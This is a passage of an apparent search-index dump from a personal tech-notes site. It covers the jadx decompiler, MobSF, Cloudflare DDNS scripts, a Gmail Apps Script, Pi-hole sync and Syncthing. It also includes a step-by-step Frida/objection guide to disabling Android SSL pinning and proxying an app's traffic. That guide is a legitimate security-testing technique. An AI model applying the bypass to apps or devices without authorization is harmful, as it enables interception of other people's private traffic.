deobfuscator included jadx-gui features:
view decompiled code with highlighted syntax jump to declaration find usage full text search smali debugger, check wiki page for setup and usage Jadx-gui key bindings can be found here
See these features in action here: jadx-gui features overview
", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#download", "title": "Download", "text": " release from github: latest unstable build After download unpack zip file go to bin
directory and run: - jadx
- command line version - jadx-gui
- UI version
On Windows run .bat
files with double-click\\ Note: ensure you have installed Java 11 or later 64-bit version. For Windows, you can download it from oracle.com (select x64 Installer).
", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#installation", "title": "Installation", "text": " Arch linux sudo pacman -S jadx\n
macOS brew install jadx\n
Flathub flatpak install flathub com.github.skylot.jadx\n
", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#usage", "title": "Usage", "text": "
jadx[-gui] [command] [options] <input files> (.apk, .dex, .jar, .class, .smali, .zip, .aar, .arsc, .aab)\ncommands (use '<command> --help' for command options):\n plugins - manage jadx plugins\n\noptions:\n -d, --output-dir - output directory\n -ds, --output-dir-src - output directory for sources\n -dr, --output-dir-res - output directory for resources\n -r, --no-res - do not decode resources\n -s, --no-src - do not decompile source code\n --single-class - decompile a single class, full name, raw or alias\n --single-class-output - file or dir for write if decompile a single class\n --output-format - can be 'java' or 'json', default: java\n -e, --export-gradle - save as android gradle project\n -j, --threads-count - processing threads count, default: 4\n -m, --decompilation-mode - code output mode:\n 'auto' - trying best options (default)\n 'restructure' - restore code structure (normal java code)\n 'simple' - simplified instructions (linear, with goto's)\n 'fallback' - raw instructions without modifications\n --show-bad-code - show inconsistent code (incorrectly decompiled)\n --no-imports - disable use of imports, always write entire package name\n --no-debug-info - disable debug info parsing and processing\n --add-debug-lines - add comments with debug line numbers if available\n --no-inline-anonymous - disable anonymous classes inline\n --no-inline-methods - disable methods inline\n --no-move-inner-classes - disable move inner classes into parent\n --no-inline-kotlin-lambda - disable inline for Kotlin lambdas\n --no-finally - don't extract finally block\n --no-replace-consts - don't replace constant value with matching constant field\n --escape-unicode - escape non latin characters in strings (with \\u)\n --respect-bytecode-access-modifiers - don't change original access modifiers\n --mappings-path - deobfuscation mappings file or directory. 
Allowed formats: Tiny and Tiny v2 (both '.tiny'), Enigma (.mapping) or Enigma directory\n --mappings-mode - set mode for handling the deobfuscation mapping file:\n 'read' - just read, user can always save manually (default)\n 'read-and-autosave-every-change' - read and autosave after every change\n 'read-and-autosave-before-closing' - read and autosave before exiting the app or closing the project\n 'ignore' - don't read or save (can be used to skip loading mapping files referenced in the project file)\n --deobf - activate deobfuscation\n --deobf-min - min length of name, renamed if shorter, default: 3\n --deobf-max - max length of name, renamed if longer, default: 64\n --deobf-whitelist - space separated list of classes (full name) and packages (ends with '.*') to exclude from deobfuscation, default: android.support.v4.* android.support.v7.* android.support.v4.os.* android.support.annotation.Px androidx.core.os.* androidx.annotation.Px\n --deobf-cfg-file - deobfuscation mappings file used for JADX auto-generated names (in the JOBF file format), default: same dir and name as input file with '.jobf' extension\n --deobf-cfg-file-mode - set mode for handling the JADX auto-generated names' deobfuscation map file:\n 'read' - read if found, don't save (default)\n 'read-or-save' - read if found, save otherwise (don't overwrite)\n 'overwrite' - don't read, always save\n 'ignore' - don't read and don't save\n --deobf-use-sourcename - use source file name as class name alias\n --deobf-res-name-source - better name source for resources:\n 'auto' - automatically select best name (default)\n 'resources' - use resources names\n 'code' - use R class fields names\n --use-kotlin-methods-for-var-names - use kotlin intrinsic methods to rename variables, values: disable, apply, apply-and-hide, default: apply\n --rename-flags - fix options (comma-separated list of):\n 'case' - fix case sensitivity issues (according to --fs-case-sensitive option),\n 'valid' - rename java identifiers to 
make them valid,\n 'printable' - remove non-printable chars from identifiers,\n or single 'none' - to disable all renames\n or single 'all' - to enable all (default)\n --integer-format - how integers are displayed:\n 'auto' - automatically select (default)\n 'decimal' - use decimal\n 'hexadecimal' - use hexadecimal\n --fs-case-sensitive - treat filesystem as case sensitive, false by default\n --cfg - save methods control flow graph to dot file\n --raw-cfg - save methods control flow graph (use raw instructions)\n -f, --fallback - set '--decompilation-mode' to 'fallback' (deprecated)\n --use-dx - use dx/d8 to convert java bytecode\n --comments-level - set code comments level, values: error, warn, info, debug, user-only, none, default: info\n --log-level - set log level, values: quiet, progress, error, warn, info, debug, default: progress\n -v, --verbose - verbose output (set --log-level to DEBUG)\n -q, --quiet - turn off output (set --log-level to QUIET)\n --version - print jadx version\n -h, --help - print this help\n\nPlugin options (-P<name>=<value>):\n 1) dex-input: Load .dex and .apk files\n - dex-input.verify-checksum - verify dex file checksum before load, values: [yes, no], default: yes\n 2) java-convert: Convert .class, .jar and .aar files to dex\n - java-convert.mode - convert mode, values: [dx, d8, both], default: both\n - java-convert.d8-desugar - use desugar in d8, values: [yes, no], default: no\n 3) kotlin-metadata: Use kotlin.Metadata annotation for code generation\n - kotlin-metadata.class-alias - rename class alias, values: [yes, no], default: yes\n - kotlin-metadata.method-args - rename function arguments, values: [yes, no], default: yes\n - kotlin-metadata.fields - rename fields, values: [yes, no], default: yes\n - kotlin-metadata.companion - rename companion object, values: [yes, no], default: yes\n - kotlin-metadata.data-class - add data class modifier, values: [yes, no], default: yes\n - kotlin-metadata.to-string - rename fields using toString, 
values: [yes, no], default: yes\n - kotlin-metadata.getters - rename simple getters to field names, values: [yes, no], default: yes\n 4) rename-mappings: various mappings support\n - rename-mappings.format - mapping format, values: [auto, TINY, TINY_2, ENIGMA, ENIGMA_DIR, MCP, SRG, TSRG, TSRG2, PROGUARD], default: auto\n - rename-mappings.invert - invert mapping, values: [yes, no], default: no\n\nEnvironment variables:\n JADX_DISABLE_ZIP_SECURITY - set to 'true' to disable all security checks for zip files\n JADX_ZIP_MAX_ENTRIES_COUNT - maximum allowed number of entries in zip files (default: 100 000)\n JADX_TMP_DIR - custom temp directory, using system by default\n\nExamples:\n jadx -d out classes.dex\n jadx --rename-flags \"none\" classes.dex\n jadx --rename-flags \"valid, printable\" classes.dex\n jadx --log-level ERROR app.apk\n jadx -Pdex-input.verify-checksum=no app.apk\n
These options also worked on jadx-gui running from command line and override options from preferences dialog", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#use-jadx-as-a-library", "title": "Use jadx as a Library", "text": "You can use jadx in your java projects, check details on wiki page
", "tags": ["android", "decompiler", "java"]}, {"location": "android/mobsf/", "title": "Mobile Security Framework (MobSF)", "text": "Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK, XAPK, IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.
Follow the project at github: MobSF/Mobile-Security-Framework-MobSF
", "tags": ["android", "penetration-testing"]}, {"location": "android/mobsf/#running-mobsf-as-docker", "title": "Running MobSF as Docker", "text": "Below is a docker run
command for running MobSF as a Docker container.
docker run \\\n-d \\\n-it \\\n-v /root/tools/mobSF:/root/.MobSF \\\n-h mobsf \\\n--name mobsf \\\n--restart always \\\n-p 8005:8000 \\\nopensecurity/mobile-security-framework-mobsf:latest\n
docker compose example for docker-compose.yml
:
version: '2.4'\n\nservices:\nmobsf:\nimage: opensecurity/mobile-security-framework-mobsf\ncontainer_name: mobsf\nhostname: mobsf\nrestart: always\nnetwork_mode: bridge\nvolumes:\n- ./:/root/.MobSF\n- /etc/localtime:/etc/localtime\nports:\n- '1337:1337'\n- '8000:8000'\n
", "tags": ["android", "penetration-testing"]}, {"location": "android/ssl-pinning-bypass/", "title": "Android SSL Pinning Bypass with Frida", "text": "", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#whats-ssl-pinning", "title": "Whats SSL Pinning?", "text": "Android app establishes an HTTPS connection, it checks the issuer of the server's certificate against the internal list of trusted Android system certificate authorities to make sure it is communicating with a trusted server. This is called SSL Pinning. If the server's certificate is not in the list of trusted certificates, the app won't be able to communicate with the server.
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#whats-frida", "title": "Whats Frida?", "text": "Frida is dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. It is a powerful tool that allows you to modify Android applications and libraries without having to recompile them.
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#requirements", "title": "Requirements", "text": " Rooted Android Phone Python 3 pip(pip3) ", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#installation", "title": "Installation", "text": "Install Frida framework, objection to your host os.
pip install frida-tools\npip install objection\n
Download the proper version from: Frida Server Downloads
Danger
Make sure to download the proper version of Frida Server for your Android CPU architecture. Always use the latest version of Frida Server and frida-tools
Extract and rename the file to frida-server. Move the file to the Android Phone at /data/local/tmp/
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#usage", "title": "Usage", "text": "Connect to adb shell to the android device
For more information:
adb shell\n
Change user to Root
su\n
Make sure you are running as root with the following command:
whoami\n
Change permissions to the /data/local/tmp/frida-server to be able to run the server
chmod 755 /data/local/tmp/frida-server\n
Run the Frida Server in background:
/data/local/tmp/frida-server\n
Warning
Do not close the terminal - this will stop the Frida Server
Go back to the host's terminal. List all the applications and find the name of the desired application you want to bypass SSL Pinning for
frida-ps -Ua\n
Now Run with the name of the application
objection -g c**********n explore -q\n
Now remove the SSL Pinning with
android sslpinning disable\n
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#set-proxy-for-applciation-with-frida-and-objection", "title": "Set Proxy for Application with frida and objection", "text": "android proxy set 192.168.5.102 8081\n
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "automation/ddns-cloudflare-bash/", "title": "DDNS Cloudflare Bash Script", "text": "When building complex infrastructure and managing multiple servers and services using ip addresses is can create a lot of issues and is not always easy to manage. The preferred way is to use a DNS provider that allows you to manage your domain names and their associated IP addresses. DDNS Cloudflare Bash script is a simple bash script that allows you to easily update your Cloudflare's DNS records
dynamically regardless of your current IP address. DDNS Cloudflare Bash Script can be used on Linux, Unix, FreeBSD, and macOS with only one requirement of curl
Source code can be found at DDNS Cloudflare Bash Github Repository.
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#about", "title": "About", "text": " DDNS Cloudflare Bash Script for most Linux, Unix distributions and MacOS. Choose any source IP address to update external or internal (WAN/LAN). For multiply lan interfaces like Wifi, Docker Networks and Bridges the script will automatically detects the primary Interface by priority. Cloudflare's options proxy and TTL configurable via the config file. Optional Telegram Notifications ", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#requirements", "title": "Requirements", "text": " curl Cloudflare api-token with ZONE-DNS-EDIT Permissions DNS Record must be pre created (api-token should only edit dns records) ", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#creating-cloudflare-api-token", "title": "Creating Cloudflare API Token", "text": "To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container ", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#installation", "title": "Installation", "text": "You can place the script at any location manually.
MacOS: Don't use the /usr/local/bin/ for the script location. Create a separate folder under your user path /Users/${USER}
The automatic install examples below will place the script at /usr/local/bin/
wget https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/update-cloudflare-dns.sh\nsudo chmod +x update-cloudflare-dns.sh\nsudo mv update-cloudflare-dns.sh /usr/local/bin/update-cloudflare-dns\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#config-file", "title": "Config file", "text": "You can use default config file update-cloudflare-dns.conf or pass your own config file as parameter to script.
wget https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/update-cloudflare-dns.conf\n
Place the config file in the directory as the update-cloudflare-dns for above example at /usr/local/bin/
sudo mv update-cloudflare-dns.conf /usr/local/bin/update-cloudflare-dns.conf\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#config-parameters", "title": "Config Parameters", "text": "Option Example Description what_ip internal Which IP should be used for the record: internal/external dns_record ddns.example.com DNS A record which will be updated, you can pass multiple A records separated by comma cloudflare_zone_api_token ChangeMe Cloudflare API Token KEEP IT PRIVATE!!!! zoneid ChangeMe Cloudflare's Zone ID proxied false Use Cloudflare proxy on dns record true/false ttl 120 120-7200 in seconds or 1 for Auto", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#optional-notifications-parameters", "title": "Optional Notifications Parameters", "text": "Option Example Description notify_me_telegram yes Use Telegram notifications yes/no telegram_chat_id ChangeMe Chat ID of the bot telegram_bot_API_Token ChangeMe Telegram's Bot API Token", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#running-the-script", "title": "Running The Script", "text": "When placed in /usr/local/bin/
update-cloudflare-dns\n
With your config file (need to be placed in same folder)
update-cloudflare-dns your_config.conf\n
Or manually
<path>/.update-cloudflare-dns.sh\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#automation-with-crontab", "title": "Automation With Crontab", "text": "You can run the script via crontab
crontab -e\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#examples", "title": "Examples", "text": "Run every minute
* * * * * /usr/local/bin/update-cloudflare-dns\n
Run with your specific config file
* * * * * /usr/local/bin/update-cloudflare-dns myconfig.conf\n
Run every 2 minutes
*/2 * * * * /usr/local/bin/update-cloudflare-dns\n
Run at boot
@reboot /usr/local/bin/update-cloudflare-dns\n
Run 1 minute after boot
@reboot sleep 60 && /usr/local/bin/update-cloudflare-dns\n
Run at 08:00
0 8 * * * /usr/local/bin/update-cloudflare-dns\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#logs", "title": "Logs", "text": "This Script will create a log file with only the last run information Log file will be located at the script's location.
Example:
/usr/local/bin/update-cloudflare-dns.log\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#limitations", "title": "Limitations", "text": "", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#license", "title": "License", "text": "", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#mit-license", "title": "MIT License", "text": "Copyright\u00a9 3os.org @2020
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-powershell/", "title": "DDNS Cloudflare PowerShell Script", "text": "When building complex infrastructure and managing multiple servers and services using ip addresses is can create a lot of issues and is not always easy to manage. The preferred way is to use a DNS provider that allows you to manage your domain names and their associated IP addresses. DDNS Cloudflare PowerShell script is a simple PowerShell script that allows you to easily update your Cloudflare's DNS records
dynamically regardless of your current IP address. DDNS Cloudflare PowerShell Script can be used on Windows operating systems without any requirements for PowerShell.
Source code can be found at DDNS Cloudflare PowerShell Github Repository.
DDNS Cloudflare PowerShell script for Windows. Choose any source IP address to update external or internal (WAN/LAN). For multiple LAN interfaces like Wifi, Docker Networks and Bridges the script will automatically detect the primary Interface by priority. Cloudflare's options for proxy and TTL configurable via the parameters. Optional Telegram or Discord Notifications ", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#requirements", "title": "Requirements", "text": " Cloudflare api-token with ZONE-DNS-EDIT Permissions DNS Record must be pre created (api-token should only edit dns records) Enabled running unsigned PowerShell ", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#creating-cloudflare-api-token", "title": "Creating Cloudflare API Token", "text": "To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container ", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#installation", "title": "Installation", "text": "Download the DDNS-Cloudflare-PowerShell zip file & Unzip, rename the folder to DDNS-Cloudflare-PowerShell place in a directory of your choosing
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#config-parameters", "title": "Config Parameters", "text": "Update the config parameters inside the update-cloudflare-dns_conf.ps1 by editing accordingly. See below for examples.
Option Example Description what_ip internal Which IP should be used for the record: internal/external dns_record ddns.example.com DNS A record which will be updated cloudflare_zone_api_token ChangeMe Cloudflare API Token KEEP IT PRIVATE!!!! zoneid ChangeMe Cloudflare's Zone ID proxied false Use Cloudflare proxy on dns record true/false ttl 120 120-7200 in seconds or 1 for Auto", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#optional-notifications-parameters-for-telegram", "title": "Optional Notifications Parameters for Telegram", "text": "Option Example Description notify_me_telegram yes Use Telegram notifications yes/no telegram_chat_id ChangeMe Chat ID of the bot telegram_bot_API_Token ChangeMe Telegram's Bot API Token", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#optional-notification-parameters-for-discord", "title": "Optional Notification Parameters for Discord", "text": "Option Example Description notify_me_discord yes Use Discord notifications yes/no discord_webhook_URL http://WebhookURL.com/asd/ Webhook URL from your Discord server settings To generate a webhook URL, follow the official Discord instructions.
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#running-the-script", "title": "Running The Script", "text": "Open cmd/powershell
Example:
powershell.exe -ExecutionPolicy Bypass -File C:\\DDNS-Cloudflare-PowerShell\\update-cloudflare-dns.ps1\n
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#automation-with-windows-task-scheduler", "title": "Automation With Windows Task Scheduler", "text": "Example: Run at boot with 1 min delay and repeat every 1 min
Open Task Scheduler Action -> Crate Task General Menu Name: update-cloudflare-dns Run whether user is logged on or not Trigger New... Begin the task: At startup Delay task for: 1 minute Repeat task every: 1 minute for duration of: indefinitely Enabled Actions New... Action: Start a Program Program/script: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Add arguments: -ExecutionPolicy Bypass -File C:\\DDNS-Cloudflare-PowerShell\\update-cloudflare-dns.ps1 ok Enter your user's password when prompted Conditions Power: Uncheck - [x] Start the task only if the computer is on AC power ", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#logs", "title": "Logs", "text": "This Script will create a log file with only the last run information Log file will be located as same directory as update-cloudflare-dns.ps1
Log file name:
update-cloudflare-dns.log\n
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#license", "title": "License", "text": "", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#mit-license", "title": "MIT License", "text": "Copyright\u00a9 3os.org @2020
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/gmail-mark-archived-mail-as-read/", "title": "Automatically Mark Archived Email as Read in Gmail", "text": "", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#background", "title": "Background", "text": "My preferred method of managing emails in Gmail is Zero Inbox
. In short, emails in Inbox work as to-do list. The Inbox may contain important email i need to attend or a digital receipt from a payment I've made a minute ago. Since I know the content of that email the task is done and I archive it. This email will move from Inbox to All Mail or a dedicated label if you have automation rules.
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#the-problem", "title": "The Problem", "text": "When using the Archive
function email which weren't opened or marked as Read
will show as number counter in All Mail or Dedicated Label. Since I'm done with those emails I have to manually mark emails as read. This is a tedious task and I don't want to do it manually
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#the-solution", "title": "The Solution", "text": "Using Google Scripts We can create a personal app
that will automatically mark emails as read when they are archived. This is a simple script that will run on Gmail and will mark emails as read when they are no longer in the inbox folder. You can choose how often you want to automatically mark archived email as read in gmail. This solution was tested on personal Gmail accounts and the Google Workspace Gmail accounts (as long you can grunt permission).
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#installation", "title": "Installation", "text": "Make sure you are logged in to your Google account. Open Google Scripts and create a new project.
You will be prompted with a new window. Rename the project to Automatically Mark Archived Email as Read
. Copy and replace the following code in the new project.
function markArchivedAsRead() {\nvar threads = GmailApp.search('label:unread -label:inbox', 0, 100);\nGmailApp.markThreadsRead(threads);\nvar spamThreads = GmailApp.search('label:spam -label:inbox', 0, 100);\nGmailApp.markThreadsRead(spamThreads);\n}\n
Your window should look like this:
Save the project.
After saving the project you should be able Run the script.
On the first run the script will ask you to give it the necessary permissions. Click Review permissions
to continue.
Since the app
is not signed you will be prompted with a warning. I's ok and safe. Click Advanced
.
Click Go to Gmail Mark Archived as Read (unsafe)
to continue.
At this point you will be prompted to grant the script Automatically Mark Archived Email as Read
access to your Gmail account. Click Allow
. This will allow the script to perform the actions you need.
If all went well you should see the log of the script as shown below.
At this point we have created an Automatically Mark Archived Email as Read
script and granted it the necessary permissions. Now we want to automate the process. We can do this by creating a new timed trigger. Head over to the Trigger menu
Click Add Trigger
.
You will be prompted to select when and how the script will run. The following example will run the script every 5 minutes, and send a failure email report once a week.
Note
The script may fail once in a while. This is due to the fact it depends on Gmail's API. Unless you receive an email with hundreds of failed attempts, you can ignore the email.
Note
Update: Some people are reporting an error which says \"This operation can only be applied to at most 100 threads. (line 3, file \"Code\")\". To fix this, you have to manually do a search for \"is:unread\" and mark all of them as read before running the script, so that it starts with a clean slate. The script can only process 100 threads per run, so if you give it more than 100 on the first run,
After creating the trigger you screen should look like this:
Now we want to ensure that the script runs every 5 minutes. We can do this in Execution
menu:
When 5 minutes passed from the point the trigger was created, the page log should look like this:
We are done with the installation and the configuration. You should already be able to see that some of the emails are marked as read.
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#limitations", "title": "Limitations", "text": "Google's API is limited to 100 threads per request - a single script's run. This means that every 5 minutes it runs it will mark 100 emails as read. Since the script is run every 5 minutes, it won't take long to mark all emails as read automatically. If you aren't able to wait you can do it mark emails as read manually.
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#troubleshooting", "title": "Troubleshooting", "text": "I've seen this script working without any issues for months, But suddenly you may receive an email with the Automatically Mark Archived Email as Read
failing to run all the time. The reason is that the script lost
the Gmail permissions. The solution is to run the script manually and grant the script the necessary permissions again, as you did the first time.
", "tags": []}, {"location": "automation/pihole-cloudflare-dns-sync/", "title": "Pi-hole Cloudflare DNS Sync", "text": "Pihole Cloudflare DNS Sync Github Repository. Pihole Cloudflare DNS Sync Docker Hub Page.
", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#description", "title": "Description", "text": "Lightweight Container image based on python:3.9.13-alpine to be used in conjunction with a Pi-hole instance to sync the DNS records from Cloudflare DNS Service to Pi-hole local DNS.
", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#supports", "title": "Supports", "text": " A records CNAME records Any type of Pi-hole instance ", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#requirements", "title": "Requirements", "text": " Cloudflare API Readonly Token Pi-hole instance ", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#creating-a-cloudflare-api-token", "title": "Creating a Cloudflare API token", "text": "To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Read Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container ", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#parameters", "title": "Parameters", "text": "Parameter Description Default Type Required CLOUDFLARE_API_TOKEN Cloudflare API Token change_me string Yes CLOUDFLARE_DOMAIN Cloudflare Domain example.com string Yes EXCLUDE_PROXIED_RECORDS Exclude Proxied Records yes string Yes PIHOLE_HOST Pi-hole hostname/IP 123.123.123.123 string Yes PIHOLE_PORT Pi-hole port 80 integer Yes USE_HTTPS http/https for pihole no string Yes PIHOLE_PASSWORD Pi-hole password change_me string Yes RUN_EVERY Run very x minute 5 integer Yes", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#usage", "title": "Usage", "text": "Docker run example:
docker run -d \\\n--name pihole-cloudflare-dns-sync \\\n-h pihole-cloudflare-dns-sync \\\n--restart always \\\n-v /etc/timezone:/etc/timezone:ro \\\n-v /etc/localtime:/etc/localtime:ro \\\n-e CLOUDFLARE_API_TOKEN=cloudflare_secret_dns_zone_api_token \\\n-e CLOUDFLARE_DOMAIN=example.com \\\n-e EXCLUDE_PROXIED_RECORDS=yes \\\n-e PIHOLE_HOST=123.123.123.123 \\\n-e PIHOLE_PORT=80 \\\n-e USE_HTTPS=no \\\n-e PIHOLE_PASSWORD=secret \\\n-e RUN_EVERY=1 \\\n-e PUID=1000 \\\n-e PGID=1000 \\\nfire1ce/pihole-cloudflare-dns-sync\n
Docker compose example:
version: '3'\n\nservices:\n pihole-cloudflare-dns-sync:\n image: fire1ce/pihole-cloudflare-dns-sync\n container_name: pihole-cloudflare-dns-sync\n hostname: pihole-cloudflare-dns-sync\n restart: always\n network_mode: bridge\n volumes:\n - /etc/timezone:/etc/timezone:ro\n - /etc/localtime:/etc/localtime:ro\n environment:\n - CLOUDFLARE_API_TOKEN=cloudflare_secret_dns_zone_api_token\n - CLOUDFLARE_DOMAIN=example.com\n - EXCLUDE_PROXIED_RECORDS=yes\n - PIHOLE_HOST=123.123.123.123\n - PIHOLE_PORT=80\n - USE_HTTPS=no\n - PIHOLE_PASSWORD=secret\n - RUN_EVERY=1\n - PUID=1000\n - PGID=1000\n
", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#license", "title": "License", "text": "This project is licensed under the GNU General Public License v3.0 - see the LICENSE file for details
", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/syncthings/", "title": "Syncthing", "text": "Syncthing is a continuous file synchronization program. Syncthing is an application that allows you to synchronize files between multiple devices. This means that creating, editing, or deleting files on one computer can be automatically copied to other devices.
Official website: syncthing.net
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#debianubuntu-installation", "title": "Debian/Ubuntu Installation", "text": "We need to add the following Syncthing
repository to the system.
First, we need to add PGP keys to allow the system to check the packages authenticity
sudo curl -s -o /usr/share/keyrings/syncthing-archive-keyring.gpg https://syncthing.net/release-key.gpg\n
Then we will add the stable Syncthing
repository channel to your APT sources
